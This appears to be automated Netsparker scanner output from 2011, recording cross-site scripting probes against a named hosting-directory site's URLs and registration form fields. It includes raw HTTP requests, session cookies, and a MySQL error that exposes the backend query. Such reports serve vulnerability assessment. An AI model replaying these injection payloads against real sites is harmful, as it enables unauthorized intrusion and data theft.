| --- | --- | --- |
| URI-BASED | Raw URI | '"--></style></script><script>alert(0x00072B)</script> |
Request
GET /file.php/faq.txt'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00072B)%3C/script%3E HTTP/1.1 Referer: http://www.hostingcatalog.com/ User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.hostingcatalog.com Cookie: PHPSESSID=ih5c11ng15cq97vpjgk3ki9jf5; time_0=1303647875; user_counted_0=%3CAND%3E101%3CAND%3E43 Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 24 Apr 2011 12:24:45 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 345 Error #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x00072B)</script>'' at line 1 in SQL SELECT page_id FROM page WHERE page_name='file.php/faq.txt'"--></style></script><script>netsparker(0x00072B)</script>'
- /file.php/contact.txt'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00073E)%3C/script%3E
Parameters
| Parameter | Type | Value |
| --- | --- | --- |
| URI-BASED | Raw URI | '"--></style></script><script>alert(0x00073E)</script> |
Request
GET /file.php/contact.txt'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00073E)%3C/script%3E HTTP/1.1 Referer: http://www.hostingcatalog.com/ User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.hostingcatalog.com Cookie: PHPSESSID=ih5c11ng15cq97vpjgk3ki9jf5; time_0=1303647875; user_counted_0=%3CAND%3E101%3CAND%3E43%3CAND%3E46 Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 24 Apr 2011 12:24:47 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 349 Error #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x00073E)</script>'' at line 1 in SQL SELECT page_id FROM page WHERE page_name='file.php/contact.txt'"--></style></script><script>netsparker(0x00073E)</script>'
- /file.php/partner1.txt'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000753)%3C/script%3E
Parameters
| Parameter | Type | Value |
| --- | --- | --- |
| URI-BASED | Raw URI | '"--></style></script><script>alert(0x000753)</script> |
Request
GET /file.php/partner1.txt'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000753)%3C/script%3E HTTP/1.1 Referer: http://www.hostingcatalog.com/ User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.hostingcatalog.com Cookie: PHPSESSID=ih5c11ng15cq97vpjgk3ki9jf5; time_0=1303647875; user_counted_0=%3CAND%3E101%3CAND%3E43%3CAND%3E46%3CAND%3E65 Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 24 Apr 2011 12:24:49 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 350 Error #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x000753)</script>'' at line 1 in SQL SELECT page_id FROM page WHERE page_name='file.php/partner1.txt'"--></style></script><script>netsparker(0x000753)</script>'
Parameters
| Parameter | Type | Value |
| --- | --- | --- |
| account_type | POST | 1 |
| address | POST | "><iMg src=N onerror=alert(9)> |
| address2 | POST | 3 |
| B1 | POST | Create An Account! |
| bill_address | POST | 3 |
| bill_address2 | POST | 3 |
| bill_city | POST | 3 |
| bill_country | POST | 240 |
| bill_phone | POST | 3 |
| bill_province | POST | 3 |
| bill_state | POST | 3 |
| bill_zip | POST | 3 |
| card_number | POST | 3 |
| card_type | POST | 1 |
| city | POST | 3 |
| company_name | POST | Smith |
| copy_from_cont | POST | 1 |
| country | POST | 240 |
| deposit | POST | 3 |
| e_mail | POST | netsparker@example.com |
| expire_date | POST | 3 |
| first_name | POST | Smith |
| last_name | POST | Smith |
| owner_first_name | POST | Smith |
| owner_last_name | POST | Smith |
| password | POST | 3 |
| phone | POST | 3 |
| promo_code | POST | 3 |
| province | POST | 3 |
| retype_e_mail | POST | netsparker@example.com |
| retype_password | POST | 3 |
| state | POST | 3 |
| zip | POST | 3 |
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060 Content-Length: 545 Accept-Encoding: gzip, deflate account_type=1&address=%22%3e%3ciMg+src%3dN+onerror%3dnetsparker(9)%3e&address2=3&B1=Create+An+Account!&bill_address=3&bill_address2=3&bill_city=3&bill_country=240&bill_phone=3&bill_province=3&bill_state=3&bill_zip=3&card_number=3&card_type=1&city=3&company_name=Smith&copy_from_cont=1&country=240&deposit=3&e_mail=netsparker%40example.com&expire_date=3&first_name=Smith&last_name=Smith&owner_first_name=Smith&owner_last_name=Smith&password=3&phone=3&promo_code=3&province=3&retype_e_mail=netsparker%40example.com&retype_password=3&state=3&zip=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 12:48:50 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>Hosting Catalog - List Your Site</title> <link rel="stylesheet" type="text/css" href="style.css"> <SCRIPT LANGUAGE="JavaScript"> <!-- function isNumber(src) { src.value=src.value.replace('$',''); if (src.value.charAt(0)=='0') { alert("Please enter correct numeric value."); src.focus(); return false; } src.value=src.value.replace(',',''); if (src.value.indexOf('.')!=-1) src.value=src.value.substr(0,src.value.indexOf('.')); if (src.value.length==0) src.value='0'; if (parseInt(src.value)<25) { alert("There's a minimum $25 deposit."); src.value='25'; } var i = 0; strField=src.value; for (i=0;i<strField.length; i++) { if ((strField.charAt(i)<'0')||(strField.charAt(i)>'9')) { alert ('Please enter a numeric value.'); src.focus(); return false; } } strField=''; var j=0; for (i=src.value.length-1;i>=0;i--) { strField=src.value.charAt(i)+strField; if ((j+1)%3==0&&i!=0) strField=','+strField; j++; } src.value=strField+'.00'; return true; } // checks date on MM/YY format function checkDate(src) { //checking if year <2002 then card is expired var exp_date=src.value; pattern="[0-9]{2}(/)[0-9]{2}"; res=exp_date.search(pattern); if (res==-1) {alert('Wrong date format!'); src.focus(); return false;} dp = exp_date.split('/'); if ((dp[0]=='00')||(parseInt(dp[0])>12)||(dp[1]=='00')||(dp[1]=='01')) {alert('Wrong date format!'); src.focus(); return false;} return true; } function describe(num) { var url="http://www.hostingcatalog.com/bid_description.php/"+num; windowVar = 
window.open(url,'desc_win','width=250,height=210,location=0,toolbar=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=1,channelmode=0,fullscreen=0'); windowVar.focus(); } function isMail(src) { src.value=src.value.toLowerCase(); addr=src.value; pattern="^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[_a-z0-9-]+(\.[_a-z0-9-]+)*(\.([a-z]{2,3}))+$"; res=addr.search(pattern); if (res==-1) { alert('Wrong mail format'); src.focus(); return false; } else return true; }// end isMail function isSame(src1,src2,str) { if (src1.value!=src2.value) { alert(str); src1.focus(); return false; } else return true; }// end isSame function isValidCardNumber(src) { var card_number=src.value; flag=true; pattern1="[0-9]{13,16}"; pattern2="[0-9]{4}(-)[0-9]{4}(-)[0-9]{4}(-)[0-9]{1,4}"; res=card_number.search(pattern1); if (res!=-1) { if (card_number.length>16) {flag=false;} } else { res=card_number.search(pattern2); if (res==-1) {flag=false;} if (card_number.length>19) {flag=false;} } if (!flag) { alert('Invalid credit card number'); src.focus(); return false; } else return true; }// end isValidCardNumber function phoneRequired(src) { var strField = new String(src.value); flag=true; if (strField=='') flag=false; /* for (i = 0; i < strField.length; i++) if (strField.charAt(i)!='-' && (strField.charAt(i) < '0' || strField.charAt(i) > '9')) { flag=false; } alert(strField.length); */ if (strField.length < 10) flag=false; if (!flag) { alert ('Please specify a correct phone number'); src.focus(); return false; } return true; }// phoneRequired function verify() { var f1=document.forms['billingForm']; if (!isMail(f1.elements['e_mail'])) return false; if (!isMail(f1.elements['retype_e_mail'])) return false; if (!isSame(f1.elements['password'],f1.elements['retype_password'],'Passwords must coincide!')) return false; if (!isSame(f1.elements['e_mail'],f1.elements['retype_e_mail'],'E-mail addresses must coincide!')) return false; if (f1.elements['company_name'].value=="") { alert('Not all fields are filled'); 
f1.elements['company_name'].focus(); return false; } if (f1.elements['first_name'].value=="") { alert('Not all fields are filled'); f1.elements['first_name'].focus(); return false; } if (f1.elements['last_name'].value=="") { alert('Not all fields are filled'); f1.elements['last_name'].focus(); return false; } if (f1.elements['address'].value=="") { alert('Not all fields are filled'); f1.elements['address'].focus(); return false; } if (f1.elements['city'].value=="") { alert('Not all fields are filled'); f1.elements['city'].focus(); return false; } if (f1.elements['state'].value=="") { alert('Not all fields are filled'); f1.elements['state'].focus(); return false; } if (f1.elements['zip'].value=="") { alert('Not all fields are filled'); f1.elements['zip'].focus(); return false; } if (f1.elements['password'].value=="") { alert('Not all fields are filled'); f1.elements['password'].focus(); return false; } if (!checkDate(f1.elements['expire_date'])) return false; if (!isValidCardNumber(f1.elements['card_number'])) return false; if (f1.elements['card_number'].value=="") { alert('Not all fields are filled'); f1.elements['card_number'].focus(); return false; } if (f1.elements['owner_first_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_first_name'].focus(); return false; } if (f1.elements['owner_last_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_last_name'].focus(); return false; } if (f1.elements['bill_address'].value=="") { alert('Not all fields are filled'); f1.elements['bill_address'].focus(); return false; } if (f1.elements['bill_city'].value=="") { alert('Not all fields are filled'); f1.elements['bill_city'].focus(); return false; } if (f1.elements['bill_country'].value=="") { alert('Not all fields are filled'); f1.elements['bill_country'].focus(); return false; } if (f1.elements['bill_zip'].value=="") { alert('Not all fields are filled'); f1.elements['bill_zip'].focus(); return false; } 
Parameters
Parameter           Type   Value
account_type        POST   1
address             POST   3
address2            POST   '"--></style></script><script>alert(0x001C7A)</script>
B1                  POST   Create An Account!
bill_address        POST   3
bill_address2       POST   3
bill_city           POST   3
bill_country        POST   240
bill_phone          POST   3
bill_province       POST   3
bill_state          POST   3
bill_zip            POST   3
card_number         POST   3
card_type           POST   1
city                POST   3
company_name        POST   Smith
copy_from_cont      POST   1
country             POST   240
deposit             POST   3
e_mail              POST   netsparker@example.com
expire_date         POST   3
first_name          POST   Smith
last_name           POST   Smith
owner_first_name    POST   Smith
owner_last_name     POST   Smith
password            POST   3
phone               POST   3
promo_code          POST   3
province            POST   3
retype_e_mail       POST   netsparker@example.com
retype_password     POST   3
state               POST   3
zip                 POST   3
Request
POST /register.php HTTP/1.1
Referer: http://www.hostingcatalog.com/register.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.hostingcatalog.com
Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060
Content-Length: 583
Accept-Encoding: gzip, deflate

account_type=1&address=3&address2='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001C7A)%3c%2fscript%3e&B1=Create+An+Account!&bill_address=3&bill_address2=3&bill_city=3&bill_country=240&bill_phone=3&bill_province=3&bill_state=3&bill_zip=3&card_number=3&card_type=1&city=3&company_name=Smith&copy_from_cont=1&country=240&deposit=3&e_mail=netsparker%40example.com&expire_date=3&first_name=Smith&last_name=Smith&owner_first_name=Smith&owner_last_name=Smith&password=3&phone=3&promo_code=3&province=3&retype_e_mail=netsparker%40example.com&retype_password=3&state=3&zip=3
Response
HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:48:53 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>Hosting Catalog - List Your Site</title> <..
Parameters
Parameter           Type   Value
account_type        POST   1
address             POST   3
address2            POST   3
B1                  POST   Create An Account!
bill_address        POST   '"--></style></script><script>alert(0x001C8A)</script>
bill_address2       POST   3
bill_city           POST   3
bill_country        POST   240
bill_phone          POST   3
bill_province       POST   3
bill_state          POST   3
bill_zip            POST   3
card_number         POST   3
card_type           POST   1
city                POST   3
company_name        POST   Smith
copy_from_cont      POST   1
country             POST   240
deposit             POST   3
e_mail              POST   netsparker@example.com
expire_date         POST   3
first_name          POST   Smith
last_name           POST   Smith
owner_first_name    POST   Smith
owner_last_name     POST   Smith
password            POST   3
phone               POST   3
promo_code          POST   3
province            POST   3
retype_e_mail       POST   netsparker@example.com
retype_password     POST   3
state               POST   3
zip                 POST   3
Request
POST /register.php HTTP/1.1
Referer: http://www.hostingcatalog.com/register.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.hostingcatalog.com
Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060
Content-Length: 583
Accept-Encoding: gzip, deflate

account_type=1&address=3&address2=3&B1=Create+An+Account!&bill_address='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001C8A)%3c%2fscript%3e&bill_address2=3&bill_city=3&bill_country=240&bill_phone=3&bill_province=3&bill_state=3&bill_zip=3&card_number=3&card_type=1&city=3&company_name=Smith&copy_from_cont=1&country=240&deposit=3&e_mail=netsparker%40example.com&expire_date=3&first_name=Smith&last_name=Smith&owner_first_name=Smith&owner_last_name=Smith&password=3&phone=3&promo_code=3&province=3&retype_e_mail=netsparker%40example.com&retype_password=3&state=3&zip=3
Response
HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:49:05 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>Hosting Catalog - List Your Site</title> <..
(Our PayPal address is paypal@hostingcatalog.com. Please specify your Hosting Catalog account email if it is different from your PayPal email). </p> <p>Don't worry; your information is safe with us. <b>We respect your privacy and will never sell of give any of your information to a 3rd party.</b></p> <p>Complete the contact and payment information forms below to get your account started and the targeted traffic streaming in!</p> </div> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="10"><img src="images/misc/spacer.gif" width="10" height="1"></td> <td width="100%" valign="top"> <span class="redstar">*</span> <strong>There is a minimum $25 deposit. </strong> <form action="https://www.hostingcatalog.com/register.php" method="post" name="billingForm" onSubmit="return verify();"> <table> <tr> <td valign="top"> <table cellpadding="1" cellspacing="1" border="0" width="100%"> <tr align="left" valign="top" bgcolor="#E1E1E1"> <td class="body"> <B>CONTACT INFORMATION</B></td> </tr> <tr align="left" valign="top"> <td class="body" width="400" nowrap> <table width="100%" border="0" cellspacing="3" cellpadding="0"> <tr> <td class="body" align="left" width="160" nowrap><span class="redstar">*</span>Company Name:</td> <td> <input class="textfield" type="text" name="company_name" size="20" maxlength="30" value="Smith"> <..
Parameters
Parameter | Type | Value
account_type | POST | 1
address | POST | 3
address2 | POST | 3
B1 | POST | Create An Account!
bill_address | POST | 3
bill_address2 | POST | '"--></style></script><script>alert(0x001C8B)</script>
bill_city | POST | 3
bill_country | POST | 240
bill_phone | POST | 3
bill_province | POST | 3
bill_state | POST | 3
bill_zip | POST | 3
card_number | POST | 3
card_type | POST | 1
city | POST | 3
company_name | POST | Smith
copy_from_cont | POST | 1
country | POST | 240
deposit | POST | 3
e_mail | POST | netsparker@example.com
expire_date | POST | 3
first_name | POST | Smith
last_name | POST | Smith
owner_first_name | POST | Smith
owner_last_name | POST | Smith
password | POST | 3
phone | POST | 3
promo_code | POST | 3
province | POST | 3
retype_e_mail | POST | netsparker@example.com
retype_password | POST | 3
state | POST | 3
zip | POST | 3
Request
POST /register.php HTTP/1.1
Referer: http://www.hostingcatalog.com/register.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.hostingcatalog.com
Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060
Content-Length: 583
Accept-Encoding: gzip, deflate

account_type=1&address=3&address2=3&B1=Create+An+Account!&bill_address=3&bill_address2='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001C8B)%3c%2fscript%3e&bill_city=3&bill_country=240&bill_phone=3&bill_province=3&bill_state=3&bill_zip=3&card_number=3&card_type=1&city=3&company_name=Smith&copy_from_cont=1&country=240&deposit=3&e_mail=netsparker%40example.com&expire_date=3&first_name=Smith&last_name=Smith&owner_first_name=Smith&owner_last_name=Smith&password=3&phone=3&promo_code=3&province=3&retype_e_mail=netsparker%40example.com&retype_password=3&state=3&zip=3
Response
HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:49:08 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Parameters
Parameter | Type | Value
account_type | POST | 1
address | POST | 3
address2 | POST | 3
B1 | POST | Create An Account!
bill_address | POST | 3
bill_address2 | POST | 3
bill_city | POST | '"--></style></script><script>alert(0x001C8C)</script>
bill_country | POST | 240
bill_phone | POST | 3
bill_province | POST | 3
bill_state | POST | 3
bill_zip | POST | 3
card_number | POST | 3
card_type | POST | 1
city | POST | 3
company_name | POST | Smith
copy_from_cont | POST | 1
country | POST | 240
deposit | POST | 3
e_mail | POST | netsparker@example.com
expire_date | POST | 3
first_name | POST | Smith
last_name | POST | Smith
owner_first_name | POST | Smith
owner_last_name | POST | Smith
password | POST | 3
phone | POST | 3
promo_code | POST | 3
province | POST | 3
retype_e_mail | POST | netsparker@example.com
retype_password | POST | 3
state | POST | 3
zip | POST | 3
Request
POST /register.php HTTP/1.1
Referer: http://www.hostingcatalog.com/register.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.hostingcatalog.com
Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060
Content-Length: 583
Accept-Encoding: gzip, deflate

account_type=1&address=3&address2=3&B1=Create+An+Account!&bill_address=3&bill_address2=3&bill_city='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001C8C)%3c%2fscript%3e&bill_country=240&bill_phone=3&bill_province=3&bill_state=3&bill_zip=3&card_number=3&card_type=1&city=3&company_name=Smith&copy_from_cont=1&country=240&deposit=3&e_mail=netsparker%40example.com&expire_date=3&first_name=Smith&last_name=Smith&owner_first_name=Smith&owner_last_name=Smith&password=3&phone=3&promo_code=3&province=3&retype_e_mail=netsparker%40example.com&retype_password=3&state=3&zip=3
Response
HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:49:10 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
(Our PayPal address is paypal@hostingcatalog.com. Please specify your Hosting Catalog account email if it is different from your PayPal email). </p> <p>Don't worry; your information is safe with us. <b>We respect your privacy and will never sell of give any of your information to a 3rd party.</b></p> <p>Complete the contact and payment information forms below to get your account started and the targeted traffic streaming in!</p> </div> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="10"><img src="images/misc/spacer.gif" width="10" height="1"></td> <td width="100%" valign="top"> <span class="redstar">*</span> <strong>There is a minimum $25 deposit. </strong> <form action="https://www.hostingcatalog.com/register.php" method="post" name="billingForm" onSubmit="return verify();"> <table> <tr> <td valign="top"> <table cellpadding="1" cellspacing="1" border="0" width="100%"> <tr align="left" valign="top" bgcolor="#E1E1E1"> <td class="body"> <B>CONTACT INFORMATION</B></td> </tr> <tr align="left" valign="top"> <td class="body" width="400" nowrap> <table width="100%" border="0" cellspacing="3" cellpadding="0"> <tr> <td class="body" align="left" width="160" nowrap><span class="redstar">*</span>Company Name:</td> <td> <input class="textfield" type="text" name="company_name" size="20" maxlength="30" value="Smith"> <..
Parameters
Parameter         Type  Value
account_type      POST  1
address           POST  3
address2          POST  3
B1                POST  Create An Account!
bill_address      POST  3
bill_address2     POST  3
bill_city         POST  3
bill_country      POST  240
bill_phone        POST  '"--></style></script><script>alert(0x001C9C)</script>
bill_province     POST  3
bill_state        POST  3
bill_zip          POST  3
card_number       POST  3
card_type         POST  1
city              POST  3
company_name      POST  Smith
copy_from_cont    POST  1
country           POST  240
deposit           POST  3
e_mail            POST  netsparker@example.com
expire_date       POST  3
first_name        POST  Smith
last_name         POST  Smith
owner_first_name  POST  Smith
owner_last_name   POST  Smith
password          POST  3
phone             POST  3
promo_code        POST  3
province          POST  3
retype_e_mail     POST  netsparker@example.com
retype_password   POST  3
state             POST  3
zip               POST  3
Request
POST /register.php HTTP/1.1
Referer: http://www.hostingcatalog.com/register.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.hostingcatalog.com
Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060
Content-Length: 583
Accept-Encoding: gzip, deflate

account_type=1&address=3&address2=3&B1=Create+An+Account!&bill_address=3&bill_address2=3&bill_city=3&bill_country=240&bill_phone='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001C9C)%3c%2fscript%3e&bill_province=3&bill_state=3&bill_zip=3&card_number=3&card_type=1&city=3&company_name=Smith&copy_from_cont=1&country=240&deposit=3&e_mail=netsparker%40example.com&expire_date=3&first_name=Smith&last_name=Smith&owner_first_name=Smith&owner_last_name=Smith&password=3&phone=3&promo_code=3&province=3&retype_e_mail=netsparker%40example.com&retype_password=3&state=3&zip=3
Response
HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:49:22 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Parameters
Parameter         Type  Value
account_type      POST  1
address           POST  3
address2          POST  3
B1                POST  Create An Account!
bill_address      POST  3
bill_address2     POST  3
bill_city         POST  3
bill_country      POST  240
bill_phone        POST  3
bill_province     POST  '"--></style></script><script>alert(0x001C9D)</script>
bill_state        POST  3
bill_zip          POST  3
card_number       POST  3
card_type         POST  1
city              POST  3
company_name      POST  Smith
copy_from_cont    POST  1
country           POST  240
deposit           POST  3
e_mail            POST  netsparker@example.com
expire_date       POST  3
first_name        POST  Smith
last_name         POST  Smith
owner_first_name  POST  Smith
owner_last_name   POST  Smith
password          POST  3
phone             POST  3
promo_code        POST  3
province          POST  3
retype_e_mail     POST  netsparker@example.com
retype_password   POST  3
state             POST  3
zip               POST  3
Request
POST /register.php HTTP/1.1
Referer: http://www.hostingcatalog.com/register.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.hostingcatalog.com
Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060
Content-Length: 583
Accept-Encoding: gzip, deflate

account_type=1&address=3&address2=3&B1=Create+An+Account!&bill_address=3&bill_address2=3&bill_city=3&bill_country=240&bill_phone=3&bill_province='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001C9D)%3c%2fscript%3e&bill_state=3&bill_zip=3&card_number=3&card_type=1&city=3&company_name=Smith&copy_from_cont=1&country=240&deposit=3&e_mail=netsparker%40example.com&expire_date=3&first_name=Smith&last_name=Smith&owner_first_name=Smith&owner_last_name=Smith&password=3&phone=3&promo_code=3&province=3&retype_e_mail=netsparker%40example.com&retype_password=3&state=3&zip=3
Response
HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:49:26 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
(Our PayPal address is paypal@hostingcatalog.com. Please specify your Hosting Catalog account email if it is different from your PayPal email). </p> <p>Don't worry; your information is safe with us. <b>We respect your privacy and will never sell of give any of your information to a 3rd party.</b></p> <p>Complete the contact and payment information forms below to get your account started and the targeted traffic streaming in!</p> </div> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="10"><img src="images/misc/spacer.gif" width="10" height="1"></td> <td width="100%" valign="top"> <span class="redstar">*</span> <strong>There is a minimum $25 deposit. </strong> <form action="https://www.hostingcatalog.com/register.php" method="post" name="billingForm" onSubmit="return verify();"> <table> <tr> <td valign="top"> <table cellpadding="1" cellspacing="1" border="0" width="100%"> <tr align="left" valign="top" bgcolor="#E1E1E1"> <td class="body"> <B>CONTACT INFORMATION</B></td> </tr> <tr align="left" valign="top"> <td class="body" width="400" nowrap> <table width="100%" border="0" cellspacing="3" cellpadding="0"> <tr> <td class="body" align="left" width="160" nowrap><span class="redstar">*</span>Company Name:</td> <td> <input class="textfield" type="text" name="company_name" size="20" maxlength="30" value="Smith"> <..
Parameters
Parameter | Type | Value
account_type | POST | 1
address | POST | 3
address2 | POST | 3
B1 | POST | Create An Account!
bill_address | POST | 3
bill_address2 | POST | 3
bill_city | POST | 3
bill_country | POST | 240
bill_phone | POST | 3
bill_province | POST | 3
bill_state | POST | 3
bill_zip | POST | '"--></style></script><script>alert(0x001CAD)</script>
card_number | POST | 3
card_type | POST | 1
city | POST | 3
company_name | POST | Smith
copy_from_cont | POST | 1
country | POST | 240
deposit | POST | 3
e_mail | POST | netsparker@example.com
expire_date | POST | 3
first_name | POST | Smith
last_name | POST | Smith
owner_first_name | POST | Smith
owner_last_name | POST | Smith
password | POST | 3
phone | POST | 3
promo_code | POST | 3
province | POST | 3
retype_e_mail | POST | netsparker@example.com
retype_password | POST | 3
state | POST | 3
zip | POST | 3
Request
POST /register.php HTTP/1.1
Referer: http://www.hostingcatalog.com/register.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.hostingcatalog.com
Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060
Content-Length: 583
Accept-Encoding: gzip, deflate

account_type=1&address=3&address2=3&B1=Create+An+Account!&bill_address=3&bill_address2=3&bill_city=3&bill_country=240&bill_phone=3&bill_province=3&bill_state=3&bill_zip='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001CAD)%3c%2fscript%3e&card_number=3&card_type=1&city=3&company_name=Smith&copy_from_cont=1&country=240&deposit=3&e_mail=netsparker%40example.com&expire_date=3&first_name=Smith&last_name=Smith&owner_first_name=Smith&owner_last_name=Smith&password=3&phone=3&promo_code=3&province=3&retype_e_mail=netsparker%40example.com&retype_password=3&state=3&zip=3
Response
HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:49:37 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
